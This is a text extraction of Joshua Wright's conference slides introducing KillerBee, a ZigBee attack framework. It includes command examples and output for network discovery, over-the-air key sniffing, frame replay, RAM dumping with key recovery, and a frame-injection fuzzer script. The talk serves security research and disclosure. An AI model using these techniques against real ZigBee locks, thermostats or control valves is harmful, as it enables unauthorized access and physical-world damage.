Killerbee: Practical Zigbee Exploitation Framework: Joshua Wright

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KillerBee: Practical ZigBee Exploitation Framework

or "Wireless Hacking and the Kinetic World"

Joshua Wright

ip[6] & 0x80 != 0

Senior Security Analyst, InGuardians Senior Instructor, SANS Institute Author of books, papers, tools: Voids warranties Taught kids to start counting from 0

50 minutes of attacking ZigBee goodness

Introduction to ZigBee Why ZigBee is Important ZigBee Examples KillerBee ZigBee Attack Framework Attack Scenarios Conclusion

What is ZigBee?
Low-power, low data rate wireless protocol Max throughput 250 Kbps Small, lightweight stack (120 KB) Built-in star or mesh topology support Long battery life (5-year goal) Range commonly 10-100 meters

ZigBee Uses IEEE 802.15.4

2.4 GHz ISM (sub 1 GHz frequencies exist but not used for ZigBee, today) 16 channels, 5 MHz separation (11-26) DSSS modulation (like 802.11b) Max frame size 127 bytes 802.15.4 also used without ZigBee
Vendors offer lightweight stacks without the fuss of ZigBee TI: TIMAC, Microchip: MiWi, Ember: ZNet, Atmel: ZigBit

ZigBee Revisions
Initial release in 2004 ZigBee-2006: Added support for encryption, frame authenticity ZigBee-2007: Added new security model with "trust center" ZigBee-PRO: ZigBee-2007 with additional software features including enhanced security

CCM* Protocol
Variation of AES-CCMP
128-bit key length Various options for MIC length (16, 32, 64, none, only MIC)

Network Key: Shared among all devices, most common key used Link Key: Unique for 2 devices Master Key: Used with SKKE for network and link key derivation (ZigBee-PRO)

50 minutes of attacking ZigBee goodness

Introduction to ZigBee Why ZigBee is Important ZigBee Examples KillerBee ZigBee Attack Framework Attack Scenarios Conclusion

Why Does the World Need ZigBee?

WiFi is too complicated*, bloated and transceivers are too expensive Bluetooth as a FHSS device uses too much power, too complex ZigBee comes in at low-cost, low-speed, low-power Connects lightweight embedded technology
When both simplicity and low cost are goals, security suffers.
* Understatement of the year, not that I'm jaded, or anything.

Why Do WE Care?
ZigBee touches the kinetic world more than any other wireless packet technology.
WiFi does not control water spill gates at a dam Bluetooth does not control lighting, HVAC and appliances in your office or home DECT does not actuate natural gas control valves

Manipulating the physical world through wireless introduces new risks Many of the past mistakes are repeated, again

Manipulating ZigBee affects the physical world in many ways now, and in the foreseeable future.

50 minutes of attacking ZigBee goodness

Introduction to ZigBee Why ZigBee is Important ZigBee Examples KillerBee ZigBee Attack Framework Attack Scenarios Conclusion

ZigBee Example 1: Smart Thermostats

ZigBee Example 2: Siemens APOGEE Floor Level Network Controller

Interface to heaters, exhaust fans, AC units and lighting through field level controllers
"With Wireless, your building will be more marketable and you will be better prepared to capitalize on future technologies." "Simply put, the network cant be compromised because the signal is automatically able to circumvent obstructions and find its target." Jay Hendrix, Siemens manager, wireless solutions

ZigBee Example 3: Kwikset SmartCode

Lock Doors with Handheld Remote or Touch Screen Automatically Unlock Doors in Case of Fire Lock or Unlock Doors with a Mobile Device or Secure Internet Connection Check Lock Status Remotely Receive Notification of Who Enters your Home and When Remotely Add or Delete Codes

Other Examples
Manufacturing systems controlling belts, lifts, motorized equipment Smart Home Systems, managing HVAC, window blinds, lighting Medical systems monitoring and reporting BP, pulse oximeter monitors Retail systems managing assets, inventory control Location analysis systems for multiple verticals

50 minutes of attacking ZigBee goodness

Introduction to ZigBee Why ZigBee is Important ZigBee Examples KillerBee ZigBee Attack Framework Attack Scenarios Conclusion

Framework and tools for exploiting ZigBee and IEEE 802.15.4 networks Simplifies sniffing and injecting traffic, packet decoding and manipulation Tools designed to aid in recon, exploitation Pure Python
Plays well with other Python tools

Minimal library dependencies BSD license (free'er then GPL)

KillerBee Hardware
AVR RZ Raven USB Stick (RZUSB, $40)
Pick up two sticks for sniff + inject

AT90USB1287 uC with AT86RF230 802.15.4 transceiver 4 LED's, PCB antenna Available from DigiKey, Mouser, etc.
Search for "RZUSB"

Free development IDE based on gcc

Other hardware evaluated but not used due to cost

RZUSB Firmware
Default RZUSB firmware accommodates 802.15.4 sniffing, End Device, PAN Coordinator KillerBee firmware required for packet injection, frame spoofing hardware ACK Programmer is AVR JTAG ICE mkII: $300
Programmer cost sucks, but alternatives aren't so hot either
See me at ToorCon or Shmoocon and I'll program your hardware, or drop me a note and we'll work something out.

KillerBee Arsenal
zbid List available devices supported zbdump "tcpdump -w" clone (libpcap or commercial Daintree SNA savefile format) zbconvert convert capture file formats zbreplay Replay attack zdsniff OTA crypto key sniffer zbfind GUI for ZigBee location tracking zbgoodfind Search memory dump for key zbassocflood ZR/ZC association flooder
Respect to the authors of similarly named tools for their excellent work

$ sudo zbid Dev Product String Serial Number 005:005 KILLERB001 839C17FFFF25 004:010 RZUSBSTICK 61A017FFFF25 $ sudo zbstumbler zbstumbler: Transmitting and receiving on interface '005:005' New Network: PANID 0x4EC5 Source 0x0000 Ext PANID: 39:32:97:90:d2:38:df:B9 Stack Profile: ZigBee Enterprise Stack Version: ZigBee 2006/2007 Channel: 15 New Network: PANID 0x858D Source 0x0000 Ext PANID: 00:00:00:00:00:00:00:00 Stack Profile: ZigBee Standard Stack Version: ZigBee 2006/2007 Channel: 11 ^C 202 packets transmitted, 183 responses. $ sudo zbdump -i '004:010' -f 11 -w out.dump zbdump: listening on '004:010', link-type DLT_IEEE802_15_4, capture size 127 bytes

50 minutes of attacking ZigBee goodness

Introduction to ZigBee Why ZigBee is Important ZigBee Examples KillerBee ZigBee Attack Framework Attack Scenarios Conclusion

Attack 1: Seriously, they do that? Key Provisioning Attack

ZigBee keys can be pre-installed or overthe-air (OTA) provisioned Most pre-install methods require reflashing device to change the key
Not optimal with limited-flash-write devices

OTA key delivery allows for frequent key rotation Key sent in plaintext no really.

OTA crypto key sniffer Reads from libpcap or Daintree SNA files automatically
Easily search all captures for OTA crypto keys
$ find . \( -name \*.dcf -o -name \*.dump \) -print0 | xargs -0 zbdsniff Processing ./ct80-rapidsedesk.dump Processing ./stumbler-chan15.dcf Processing ./newclient.dump NETWORK KEY FOUND: 00:02:00:01:0b:64:01:04:00:02:00:01:0b:64:01:04 Destination MAC Address: 00:d1:e4:a7:bb:f2:34:e7 Source MAC Address: 00:9c:a9:23:5c:ef:23:b2 Processing ./ct80-conn3.dcf

Attack 2: Wait, Is this 1996? Replay Attack

802.15.4 has no replay protection ZigBee has meager replay protection Attacker can replay any previously observed traffic until key rotation (a.k.a. "forever") Isn't that just like the WEP and ARP thing?
Yes, it is.

Impact varies with the nature of the traffic

Used successfully against multiple vendors

Consider: Replaying a message actuating water control valve to open 1 degree, repeated multiple times

Straightforward, unintelligent replay attack The analyst decides what to replay, and observes the response Daintree DCF files are ASCII, easy to chop up
$ zbreplay ERROR: Must specify a channel with f zbreplay: replay ZigBee/802.15.4 network traffic from libpcap or Daintree files Usage: zbreplay [-rRfiDch] [-f channel] [-r pcapfile] [-R daintreefile] [-i devnumstring] [-s delay/float] [-c countpackets]

$ sudo zbreplay -f 11 -r newclient.dump -s .1 zbreplay: retransmitting frames from 'newclient.dump' on interface '005:005' with a delay of 0.100000 seconds. 4 packets transmitted

Attack 3: Hardware is the new Software

Props to Joe Grand for his talk at Hack in the Box

Nature of ZigBee and IEEE 802.15.4 networks is to have lots of small, distributed devices Unless OTA key delivery is used, all devices must have key stored in flash When device boots, key is moved to RAM Leverage device to retrieve encryption key, access network or decrypt all traffic
This is not unlike WPA2-PSK networks, where each device has knowledge of the key. A compromised device is a compromised network. No key rotation makes this even more useful.

Locate a Device To Steal: zbfind

Cheers to Mike Kershaw for all the GTK work for this tool.

Analyze It: GoodFET

Flexible hardware debug interface tool from Travis Goodspeed Support for Chipcon (TI), Ember and other chips through various JTAG variants Common vulnerability in Ember, TI chips to extract RAM even when chip is locked
Issue erase to zero flash and unlock device, RAM not cleared and can be extracted to a Intel hexfile

Key Recovery: zbgoodfind

Convert hexfile to binary file with objcopy Using an encrypted packet, attempt to decrypt with each possible key value in RAM Can also be used with bus sniffing output for older chips without integrated uC's
$ sudo dumpdata chipcon-2430-mem.hex Target identifies as CC2430/r04. Dumping data from e000 to ffff as chipcon-2430-mem.hex. ... $ objcopy -I ihex -O binary chipcon-2430-mem.hex chipcon-2430-mem.bin $ zbgoodfind -R encdata.dcf -f chipcon-2430-mem.hex zbgoodfind: searching the contents of chipcon-2430-mem.hex for encryption keys with the first encrypted packet in encdata.dcf. Key found after 6397 guesses: c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf

Decrypt It
Wireshark has built-in support for decrypting ZigBee Network (NWK) encryption Enter the key in reverse-byte order

KillerBee API
Simple interface for channel selection, packet injection, sniffing MAC, NWK and APS frame decoding Also support for crypto methods and working with packet captures Core of tools like zbdsniff are ~10 lines of Python Epydoc API documentation included in the ToorCon KillerBee CD

print "KillerBee" + "Sulley" + "Goodness"

from killerbee import * from sulley import * src = "\x00\x0d\x6f\x04\x00\x00\x00\x50" s_initialize("MAC Command Mutation") # Frame control + Seq Num + DPANID + DA s_static("\x43\xc8\x00\xff\xff\xff\xff") s_static(src[::-1]) # Reverse address s_byte(0, full_range=True) kb = KillerBee() kb.set_channel(26) while s_mutate(): kb.inject(s_render()) print hexdump(s_render())

KillerBee Still in Development

API is fairly stable, minor bugs need addressing here and there Need more testing, exposure to more ZigBee and IEEE 802.15.4 networks ToorCon Special Release: KillerBee CD and tools
ZigBee and IEEE 802.15.4 docs, sample packet captures, KillerBee API documentation included

Hardware flashing party and stable release slated for ShmooCon 2010
Also keep an eye on for 802.15.4 and ZigBee support currently in development

50 minutes of attacking ZigBee goodness

Introduction to ZigBee Why ZigBee is Important ZigBee Examples KillerBee ZigBee Attack Framework Attack Scenarios Conclusion

Thoughts on ZigBee
Security demarcation issues between consumer devices and interfacing service providers Key provisioning is hard, key revocation is unheard of ZigBee has problems with CCMP as a stream cipher and IV reuse (known plaintext recovery) Each vendor makes their stack available as open source, and all have problems Adoption will continue in critical technology areas it's too attractive for embedded development to avoid

ZigBee is a growing low-power wireless protocol Rapidly gaining market acceptance and deployment numbers KillerBee is a hacker-friendly interface to experimenting with ZigBee security ZigBee interfaces with the kinetic world, controlling insignificant and critical devices
To date, vendors haven't taken ZigBee security seriously due to the lack of attack tool availability. It's not going to get better until we have a practical attack surface.

Coming in 2010
Hacking Exposed Wireless, 2nd Edition Jon Ellch, Joshua Wright, Vinnie Liu We dug deep to put this together
Never before seen tools Never before seen techniques Updated coverage of the attacks you love

Chapter devoted to attacking and exploiting ZigBee networks

Covers KillerBee, other hardware and software tools

tcp[13] & 0x01 != 0

Questions? Watch for KillerBee updates and public release schedule. Contact for information on ZigBee, wireless and information security consulting. Special thanks to Nick DePetrillo and Ed Skoudis for their support. Thank You for attending.

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